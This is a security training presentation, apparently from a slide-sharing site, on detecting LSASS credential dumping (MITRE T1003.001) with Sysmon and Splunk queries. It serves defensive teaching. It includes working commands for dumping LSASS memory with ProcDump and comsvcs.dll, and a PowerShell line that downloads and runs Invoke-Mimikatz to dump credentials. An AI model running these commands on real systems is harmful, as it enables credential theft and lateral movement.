Uploaded bywaizuq
PPTX, PDF415 views

Mitre Attack - Credential Dumping - updated.pptx

The document discusses the OS Credential Dumping technique used by attackers to obtain login and password information from the Local Security Authority Subsystem Service (LSASS) process memory. It describes three main methods attackers use - dumping LSASS memory using Windows Task Manager, ProcDump tool, or Comsvcs.dll. Detection rules are provided to monitor for these activities in Splunk, including monitoring for dumping files, ProcDump and Comsvcs.dll execution, and LSASS process access. Finally, it mentions attackers can use Mimikatz to extract passwords from the dumped LSASS memory files.

Internet
Related topics:
mitre-att-ck

Embed presentation

Download to read offline
MITRE ATT&CK Techniques - OS Credential Dumping https://redcanary.com/threat-detection-report/techniques/lsass-memory/ https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques- t1003-credential-dumping
 Goal: Able to detect the Credential dumping performed by attacker using Splunk SIEM.  Achievement: Able to Create Rules/SPL command and SIEM able to detect the process perform by the attacker.  Impact:Adversaries can use credentials gathered by this technique to:  Access restricted information  Access critical assets  Perform lateral movement through the network by compromising other systems using the same credentials  Create new accounts, perform actions, and remove the new account to clear tracks  Analyze password patterns and password policy to reveal other credentials OS Credential Dumping (Technique :Credential Dumping-T1003.001 LSASS Memory)
Introduction Technique :Credential Dumping-T1003.001 LSASS Memory  This Technique enables adversaries to obtain account login and  password information from the operating system and software.  The Local Security Authority Subsystem Service (LSASS) stores credentials  of the logged in users in memory to provide seamless access to network resources  without re-entering their credentials How?  Attacker required to interact with the lsass.exe process and dump its memory. Methods  Several Methods and Tools can be utilized to dump credentials in memory: 1. Windows Task Manager: Create Dump File feature of the Windows Task Manager can dump the memory of the lsass.exe process since Windows Vista/Server 2008. 2. ProcDump: A command-line utility that is a part of the Microsoft Sysinternals suite – Mostly used by Attacker 3. Comsvcs.dll: Native Windows DLL located in the %systemroot%system32 directory. It has a MiniDump function to dump lsass.exe process memory to retrieve credentials. LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re- entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
LSASS dump via Procdump LSASS dump via Task Manager LSASS dump via Comsvcs.dll Gained Access to Victim’s machine Attacker Use Case
Attack Diagram Attacker gained access to victim’s machine and use OS Credential Dumping Technique to obtain account login and password Client PC (Victim) 10.10.10.x SPLUNK SIEM Server 192.168.10.x
Pre-requisite  VM test machine – OS Windows  Splunk Server  Splunk Forwarder  Enable Sysmon  Procdump LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
OS Credential Dumping (Technique :Credential Dumping-T1003.001 LSASS Memory) – Attack Flow
LSASS Dump via Windows Task Manager – 1st Method  Dumping Memory of lsass.exe Process with Task Manager  Open the task manager and click more details to open all processes.  Right-click on the Local Security Authority Process under Windows Processes.  Click on Create dump file. One way it can be achieved is through Task Manager itself, by right clicking on lsass.exe and selecting “Create dump file”. In this way we don’t need to upload any suspicious executable on the target machine, as Attacker can then download the DMP file and extract the credentials offline. Credentials were dumped manually via Task Manager as they RDPed into each system. – RDP vulnerability exploited.
Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*lsass*.dmp" Image="C:Windows*taskmgr.exe" | table TaskCategory, EventCode, Image, TargetFilename Note; -This is the query we use in Splunk to detect credential dumping using this method -For this method, in Splunk we are looking for the detection of event Code 11, which is refer to ‘File Create’ operation. -The process and target file associated with ‘File Create’ operation is Task Manager & file name created containing .dmp which is dump file.
LSASS Dump via Procdump – 2nd Method  Download Procdump. It’s a Windows Syinternal Tools. It allows to create dumps of the processes  Use command - procdump.exe -accepteula -ma lsass.exe lsass.dmp File successfully dump. ***Note : Need to run as administrator Procdump -Is legitimate software thus it will not be considered as a malware when we run. -Primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. Possible vulnerability exploited; SMB protocol – attacker can gain access to victim share and upload Procdump to execute.
Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:WINDOWSsystem32lsass.exe" GrantedAccess="0x1FFFFF" ("procdump")) | dedup TaskCategory | table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine, GrantedAccess Note; -For this method, in Splunk we are looking for the detection of event Code 1 ‘Process Create’ and Code10 (‘Process Access’). -Process Create is to detect when procdump app is executed, and Process Access to detect which process is procdump accessing to, in this case, LSASS process. -Since we are using custom sysmon configuration, anything related to credential dumping using LSASS will be detected under rule name, technique_name=Credential Dumping. Already configured.
LSASS Dump via Comsvcs.dll – 3rd Method  We need process id of lsass.exe to dump its memory using Comsvcs.dll:  Use Command Get-Process lsass Comsvcsdll is built in Windows DLL, it has a MiniDump function which can be used to dump lsass.exe process memory Dynamic-link library -library files contain code to carry out a specific function for an application in the Windows operating systems
Cont…  Use command .rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump 692 C:testlsass.dmp full ***Note : Need to run as administrator -Windows DLL Host (rundll32.exe) is used to execute and called MiniDumpW function in comsvcs.dll, -Then it will create a MiniDump file. **** MiniDumpW original function in comsvcs.dll actually used by developers to debug when applications crash
Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll | table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage, CommandLine Note; -For this method, in Splunk we are looking for the detection related to comsvcs.dll. -We are able to detect 3 important eventcode associated with comsvc.dll -EventCode 1, 7 and 10. 1=Process Create, detect execution of Windows Rundll32.exe 7=ImageLoaed, which is Windows Rundll32 called comsvcs.dll (To execute MiniDump function) 10=Process Access, to detect process accessing to lsass.exe
Alert Triggered
How attacker extract password from dump file?  Using Mimikatz  After creating a dump file of lsass.exe process, attacker can use Mimikatz to extract passwords hashes  Either attacker download mimikatz to victim's pc & execute or attacker can upload the generated dump file to their pc for offline crack hashes.
How?  Command - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMa fia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invok e-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
https://redcanary.com/threat-detection- report/techniques/lsass-memory/ -comsvcs https://www.ired.team/offensive-security/credential- access-and-credential-dumping/dump-credentials-from- lsass-process-without-mimikatz -all https://www.picussecurity.com/resource/blog/picus-10- critical-mitre-attck-techniques-t1003-credential-dumping -all -including invoke-mimikatz

More Related Content

PDF
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
PDF
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
PDF
A Threat Hunter Himself
bySergey Soldatov
 
PDF
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
PPTX
SIEM (Security Information and Event Management)
byOsama Ellahi
 
PPTX
Penetration testing reporting and methodology
byRashad Aliyev
 
PPT
Web Application Security
byAbdul Wahid
 
PDF
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
byEdureka!
 
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
A Threat Hunter Himself
bySergey Soldatov
 
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
SIEM (Security Information and Event Management)
byOsama Ellahi
 
Penetration testing reporting and methodology
byRashad Aliyev
 
Web Application Security
byAbdul Wahid
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
byEdureka!
 

What's hot

PPTX
Kheirkhabarov24052017_phdays7
byTeymur Kheirkhabarov
 
PDF
Ceh v5 module 04 enumeration
byVi Tính Hoàng Nam
 
PPTX
Web security
byPadam Banthia
 
PDF
Application Security - Your Success Depends on it
byWSO2
 
PDF
Windows Threat Hunting
byGIBIN JOHN
 
PPTX
Secure coding practices
byScott Hurrey
 
PPTX
SQL injection
byRaj Parmar
 
PPTX
Security Information Event Management - nullhyd
byn|u - The Open Security Community
 
PDF
Threat Hunting with Splunk Hands-on
bySplunk
 
PDF
Introduction to MITRE ATT&CK
byArpan Raval
 
PPTX
Privileged Access Management (PAM)
bydanb02
 
PPTX
Cyber kill chain
byAnkita Ganguly
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PDF
Overview of the Cyber Kill Chain [TM]
byDavid Sweigert
 
PPT
Ethical Hacking and Penetration Testing
byRishabh Upadhyay
 
PDF
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
byCrowdStrike
 
PPTX
Ethical hacking/ Penetration Testing
byANURAG CHAKRABORTY
 
PPTX
Threat hunting and achieving security maturity
byDNIF
 
PPT
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
PPTX
Windows privilege escalation by Dhruv Shah
byOWASP Delhi
 
Kheirkhabarov24052017_phdays7
byTeymur Kheirkhabarov
 
Ceh v5 module 04 enumeration
byVi Tính Hoàng Nam
 
Web security
byPadam Banthia
 
Application Security - Your Success Depends on it
byWSO2
 
Windows Threat Hunting
byGIBIN JOHN
 
Secure coding practices
byScott Hurrey
 
SQL injection
byRaj Parmar
 
Security Information Event Management - nullhyd
byn|u - The Open Security Community
 
Threat Hunting with Splunk Hands-on
bySplunk
 
Introduction to MITRE ATT&CK
byArpan Raval
 
Privileged Access Management (PAM)
bydanb02
 
Cyber kill chain
byAnkita Ganguly
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
Overview of the Cyber Kill Chain [TM]
byDavid Sweigert
 
Ethical Hacking and Penetration Testing
byRishabh Upadhyay
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
byCrowdStrike
 
Ethical hacking/ Penetration Testing
byANURAG CHAKRABORTY
 
Threat hunting and achieving security maturity
byDNIF
 
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
Windows privilege escalation by Dhruv Shah
byOWASP Delhi
 

Similar to Mitre Attack - Credential Dumping - updated.pptx

PPT
Module 8 System Hacking
byleminhvuong
 
PDF
Windows attacks - AT is the new black
byChris Gates
 
PDF
ATT&CK Updates- Defensive ATT&CK
byMITRE ATT&CK
 
PPTX
Defend Your Data Now with the MITRE ATT&CK Framework
byTripwire
 
PPTX
Windows post exploitation
byyarden hanan
 
PDF
_Hackercool - September 2021.pdf
byssuser5e1b13
 
PPTX
Windows 10 CredentialGuard vs Mimikatz - SEC599
byErik Van Buggenhout
 
PPTX
Owning computers without shell access 2
byRoyce Davis
 
PDF
74 Methods for Privilege Escalation Part 2
byHadess
 
PDF
Getting Bear-y Cozy with PowerShell
byJamieWilliams130
 
PDF
Introduction to Windows Dictionary Attacks
byNetSPI
 
PPTX
Windows Malware Techniques
byLee C
 
PPTX
Fall of a domain | From local admin to Domain user hashes
byn|u - The Open Security Community
 
PPTX
So you want to be a security expert
byRoyce Davis
 
PDF
Windows Attacks AT is the new black
byRob Fuller
 
PDF
mimikatz attach stypes - mimikatx attach
byssuser82a6381
 
PPTX
Creds extraction
byIlan Mindel
 
PDF
Forensics perspective ERFA-møde marts 2017
byJ Hartig
 
PPTX
Hunting for Cyber Threats Using Threat Modeling & Frameworks
byTripwire
 
PPTX
Lateral Movement - Phreaknik 2016
byXavier Ashe
 
Module 8 System Hacking
byleminhvuong
 
Windows attacks - AT is the new black
byChris Gates
 
ATT&CK Updates- Defensive ATT&CK
byMITRE ATT&CK
 
Defend Your Data Now with the MITRE ATT&CK Framework
byTripwire
 
Windows post exploitation
byyarden hanan
 
_Hackercool - September 2021.pdf
byssuser5e1b13
 
Windows 10 CredentialGuard vs Mimikatz - SEC599
byErik Van Buggenhout
 
Owning computers without shell access 2
byRoyce Davis
 
74 Methods for Privilege Escalation Part 2
byHadess
 
Getting Bear-y Cozy with PowerShell
byJamieWilliams130
 
Introduction to Windows Dictionary Attacks
byNetSPI
 
Windows Malware Techniques
byLee C
 
Fall of a domain | From local admin to Domain user hashes
byn|u - The Open Security Community
 
So you want to be a security expert
byRoyce Davis
 
Windows Attacks AT is the new black
byRob Fuller
 
mimikatz attach stypes - mimikatx attach
byssuser82a6381
 
Creds extraction
byIlan Mindel
 
Forensics perspective ERFA-møde marts 2017
byJ Hartig
 
Hunting for Cyber Threats Using Threat Modeling & Frameworks
byTripwire
 
Lateral Movement - Phreaknik 2016
byXavier Ashe
 

Recently uploaded

PDF
Modernize everything Microsoft session.pdf
byjeyfox1
 
PDF
Dublin Core Metadata : Library’s Digital DNA
byDeepanshu Kumar Yadav
 
PDF
The Role of Micro-interactions in Modern Web Design
bydigitalcrafters0810
 
PDF
2025 Archive - Zsolt Nemeth web blogging
byZsolt Nemeth
 
PDF
Enshittification and the Current State of UX/Product
byAndrew Turnbull
 
DOCX
Get Verified Payeer Accounts_ Complete Payeer Account Verification Guide (202...
byBEST IT SMM
 
PPTX
Victoria University Transcripts
byvgki5qphpa
 
PDF
Top 7 Instagram Monitoring Apps of 2025 – Feature Overview
byMichael Carter
 
PDF
How to Verify Someone from Dating or Marketplace Apps
bySocial Searcher
 
PPTX
Universidad Internacional Villanueva Transcripts
bynxv6x4gd42
 
PDF
Network Security Services for Businesses: 5 Simple Ways to Protect Your Network
byPreemptive Technofield
 
Modernize everything Microsoft session.pdf
byjeyfox1
 
Dublin Core Metadata : Library’s Digital DNA
byDeepanshu Kumar Yadav
 
The Role of Micro-interactions in Modern Web Design
bydigitalcrafters0810
 
2025 Archive - Zsolt Nemeth web blogging
byZsolt Nemeth
 
Enshittification and the Current State of UX/Product
byAndrew Turnbull
 
Get Verified Payeer Accounts_ Complete Payeer Account Verification Guide (202...
byBEST IT SMM
 
Victoria University Transcripts
byvgki5qphpa
 
Top 7 Instagram Monitoring Apps of 2025 – Feature Overview
byMichael Carter
 
How to Verify Someone from Dating or Marketplace Apps
bySocial Searcher
 
Universidad Internacional Villanueva Transcripts
bynxv6x4gd42
 
Network Security Services for Businesses: 5 Simple Ways to Protect Your Network
byPreemptive Technofield
 

Mitre Attack - Credential Dumping - updated.pptx

  • 1.
    MITRE ATT&CK Techniques- OS Credential Dumping https://redcanary.com/threat-detection-report/techniques/lsass-memory/ https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques- t1003-credential-dumping
  • 2.
     Goal: Ableto detect the Credential dumping performed by attacker using Splunk SIEM.  Achievement: Able to Create Rules/SPL command and SIEM able to detect the process perform by the attacker.  Impact:Adversaries can use credentials gathered by this technique to:  Access restricted information  Access critical assets  Perform lateral movement through the network by compromising other systems using the same credentials  Create new accounts, perform actions, and remove the new account to clear tracks  Analyze password patterns and password policy to reveal other credentials OS Credential Dumping (Technique :Credential Dumping-T1003.001 LSASS Memory)
  • 3.
    Introduction Technique :Credential Dumping-T1003.001LSASS Memory  This Technique enables adversaries to obtain account login and  password information from the operating system and software.  The Local Security Authority Subsystem Service (LSASS) stores credentials  of the logged in users in memory to provide seamless access to network resources  without re-entering their credentials How?  Attacker required to interact with the lsass.exe process and dump its memory. Methods  Several Methods and Tools can be utilized to dump credentials in memory: 1. Windows Task Manager: Create Dump File feature of the Windows Task Manager can dump the memory of the lsass.exe process since Windows Vista/Server 2008. 2. ProcDump: A command-line utility that is a part of the Microsoft Sysinternals suite – Mostly used by Attacker 3. Comsvcs.dll: Native Windows DLL located in the %systemroot%system32 directory. It has a MiniDump function to dump lsass.exe process memory to retrieve credentials. LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re- entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
  • 4.
    LSASS dump via Procdump LSASSdump via Task Manager LSASS dump via Comsvcs.dll Gained Access to Victim’s machine Attacker Use Case
  • 5.
    Attack Diagram Attacker gainedaccess to victim’s machine and use OS Credential Dumping Technique to obtain account login and password Client PC (Victim) 10.10.10.x SPLUNK SIEM Server 192.168.10.x
  • 6.
    Pre-requisite  VM testmachine – OS Windows  Splunk Server  Splunk Forwarder  Enable Sysmon  Procdump LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
  • 7.
    OS Credential Dumping (Technique:Credential Dumping-T1003.001 LSASS Memory) – Attack Flow
  • 8.
    LSASS Dump viaWindows Task Manager – 1st Method  Dumping Memory of lsass.exe Process with Task Manager  Open the task manager and click more details to open all processes.  Right-click on the Local Security Authority Process under Windows Processes.  Click on Create dump file. One way it can be achieved is through Task Manager itself, by right clicking on lsass.exe and selecting “Create dump file”. In this way we don’t need to upload any suspicious executable on the target machine, as Attacker can then download the DMP file and extract the credentials offline. Credentials were dumped manually via Task Manager as they RDPed into each system. – RDP vulnerability exploited.
  • 9.
    Result from Splunk; SPLCommand : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*lsass*.dmp" Image="C:Windows*taskmgr.exe" | table TaskCategory, EventCode, Image, TargetFilename Note; -This is the query we use in Splunk to detect credential dumping using this method -For this method, in Splunk we are looking for the detection of event Code 11, which is refer to ‘File Create’ operation. -The process and target file associated with ‘File Create’ operation is Task Manager & file name created containing .dmp which is dump file.
  • 10.
    LSASS Dump viaProcdump – 2nd Method  Download Procdump. It’s a Windows Syinternal Tools. It allows to create dumps of the processes  Use command - procdump.exe -accepteula -ma lsass.exe lsass.dmp File successfully dump. ***Note : Need to run as administrator Procdump -Is legitimate software thus it will not be considered as a malware when we run. -Primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. Possible vulnerability exploited; SMB protocol – attacker can gain access to victim share and upload Procdump to execute.
  • 11.
    Result from Splunk; SPLCommand : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:WINDOWSsystem32lsass.exe" GrantedAccess="0x1FFFFF" ("procdump")) | dedup TaskCategory | table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine, GrantedAccess Note; -For this method, in Splunk we are looking for the detection of event Code 1 ‘Process Create’ and Code10 (‘Process Access’). -Process Create is to detect when procdump app is executed, and Process Access to detect which process is procdump accessing to, in this case, LSASS process. -Since we are using custom sysmon configuration, anything related to credential dumping using LSASS will be detected under rule name, technique_name=Credential Dumping. Already configured.
  • 12.
    LSASS Dump viaComsvcs.dll – 3rd Method  We need process id of lsass.exe to dump its memory using Comsvcs.dll:  Use Command Get-Process lsass Comsvcsdll is built in Windows DLL, it has a MiniDump function which can be used to dump lsass.exe process memory Dynamic-link library -library files contain code to carry out a specific function for an application in the Windows operating systems
  • 13.
    Cont…  Use command.rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump 692 C:testlsass.dmp full ***Note : Need to run as administrator -Windows DLL Host (rundll32.exe) is used to execute and called MiniDumpW function in comsvcs.dll, -Then it will create a MiniDump file. **** MiniDumpW original function in comsvcs.dll actually used by developers to debug when applications crash
  • 14.
    Result from Splunk; SPLCommand : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll | table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage, CommandLine Note; -For this method, in Splunk we are looking for the detection related to comsvcs.dll. -We are able to detect 3 important eventcode associated with comsvc.dll -EventCode 1, 7 and 10. 1=Process Create, detect execution of Windows Rundll32.exe 7=ImageLoaed, which is Windows Rundll32 called comsvcs.dll (To execute MiniDump function) 10=Process Access, to detect process accessing to lsass.exe
  • 15.
  • 16.
    How attacker extractpassword from dump file?  Using Mimikatz  After creating a dump file of lsass.exe process, attacker can use Mimikatz to extract passwords hashes  Either attacker download mimikatz to victim's pc & execute or attacker can upload the generated dump file to their pc for offline crack hashes.
  • 17.
    How?  Command -IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMa fia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invok e-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
  • 18.

Editor's Notes

  • #2 Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  • #3 Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  • #4 Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  • #8 Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation